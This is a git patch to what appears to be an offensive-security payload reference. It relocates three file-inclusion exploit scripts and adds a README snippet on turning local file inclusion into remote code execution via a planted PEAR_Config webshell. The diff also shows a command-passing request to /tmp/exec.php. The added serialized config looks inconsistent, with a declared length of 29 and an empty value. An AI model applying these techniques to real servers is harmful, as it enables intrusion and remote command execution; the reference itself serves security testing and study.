From 892c68e6e7c4daa53b65ec71cb9c9a9d9904fdcf Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 2 Oct 2023 17:12:36 +0200
Subject: [PATCH] PEAR_Config example

---
 File Inclusion/{ => Files}/LFI2RCE.py | 0
 File Inclusion/{ => Files}/phpinfolfi.py | 0
 File Inclusion/{ => Files}/uploadlfi.py | 0
 File Inclusion/README.md | 7 +++++++
 4 files changed, 7 insertions(+)
 rename File Inclusion/{ => Files}/LFI2RCE.py (100%)
 rename File Inclusion/{ => Files}/phpinfolfi.py (100%)
 rename File Inclusion/{ => Files}/uploadlfi.py (100%)

diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/Files/LFI2RCE.py
similarity index 100%
rename from File Inclusion/LFI2RCE.py
rename to File Inclusion/Files/LFI2RCE.py
diff --git a/File Inclusion/phpinfolfi.py b/File Inclusion/Files/phpinfolfi.py
similarity index 100%
rename from File Inclusion/phpinfolfi.py
rename to File Inclusion/Files/phpinfolfi.py
diff --git a/File Inclusion/uploadlfi.py b/File Inclusion/Files/uploadlfi.py
similarity index 100%
rename from File Inclusion/uploadlfi.py
rename to File Inclusion/Files/uploadlfi.py
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 9fece48..566245d 100644
--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -520,6 +520,13 @@ There are two ways to exploit it.
 /vuln.php?file=/tmp/exec.php&c=id
 ```
 
+The created configuration file contains the webshell.
+
+```php
+#PEAR_Config 0.9
+a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"";}
+```
+
 ## LFI to RCE via credentials files